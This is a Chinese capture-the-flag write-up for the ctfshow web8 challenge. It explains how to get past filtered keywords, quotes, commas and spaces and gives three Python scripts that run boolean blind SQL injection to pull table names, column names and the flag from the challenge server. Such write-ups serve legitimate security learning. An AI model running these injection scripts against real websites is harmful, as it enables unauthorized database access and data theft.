[大数据]ctfshow web8--sql注入

问题描述

题目提示是一道sql注入题

打开题目，猜测注入点应该在id那里

经过测试，发现该题过滤了union关键字、单引号、逗号、空格

问题解决?

1.过滤了union关键字就不可以用联合注入了，尝试布尔盲注。

2.过滤了逗号，使用mid(username from 1 for 1)代替mid(username,1,1)；

? ? ? ? ? ? ? ? ? ? ? ? 使用limit 1 offset 1代替limit 1,1

3.过滤了空格就是用/**/注释来绕过。

4.过滤了单引号，我们使用ord()将待检测字符转换为ascii进行比较

下面我们来写python脚本跑一下

获取数据表名

import requests

chars = "}{-0123456789abcdefghijklmnopqrstuvwxyz"#待测试字符
url = "http://f56a615a-e323-4905-a8a3-1818f9f454d9.challenge.ctf.show/index.php"#题目地址

for n in range(0,2):#爆破前两个表
    table_name = ''
    for i in range(1, 10):#爆破数据表名的前十位（我们猜测该表名长度低于十位）
        for char in chars:#测试每一个待测字符
            params = {
            "id":
"-1/**/or/**/ord(mid((select/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema/**/in/**/(database())/**/limit/**/1/**/offset/**/"+str(n)+")/**/from/**/"+str(i)+"/**/for/**/1))/**/in/**/("+str(ord(char))+")"
            }
            r = requests.get(url=url, params=params)
            #print(r.request.url)
            if "If" in r.text:
                table_name += char
    print( table_name)

获取字段名

import requests

chars = "}{-0123456789abcdefghijklmnopqrstuvwxyz"
url = "http://f56a615a-e323-4905-a8a3-1818f9f454d9.challenge.ctf.show/index.php"

for n in range(0,1):
    table_name = ''
    for i in range(1, 10):
        for char in chars:
            params = {
            "id":
"-1/**/or/**/ord(mid((select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_name/**/in/**/(0x666c6167)/**/limit/**/1/**/offset/**/"+str(n)+")/**/from/**/"+str(i)+"/**/for/**/1))/**/in/**/("+str(ord(char))+")"
            }
            r = requests.get(url=url, params=params)
            #print(r.request.url)
            if "If" in r.text:
                table_name += char
    print( table_name)

获取字段值

import requests

chars = "}{-0123456789abcdefghijklmnopqrstuvwxyz"
url = "http://f56a615a-e323-4905-a8a3-1818f9f454d9.challenge.ctf.show/index.php"

for n in range(0,1):
    table_name = ''
    for i in range(1, 50):
        for char in chars:
            params = {
            "id":
"-1/**/or/**/ord(mid((select/**/flag/**/from/**/flag/**/limit/**/1/**/offset/**/"+str(n)+")/**/from/**/"+str(i)+"/**/for/**/1))/**/in/**/("+str(ord(char))+")"
            }
            r = requests.get(url=url, params=params)
            #print(r.request.url)
            if "If" in r.text:
                table_name += char
    print( table_name)

获取flag

来自ctf小菜鸡的日常分享，欢迎各位大佬留言。?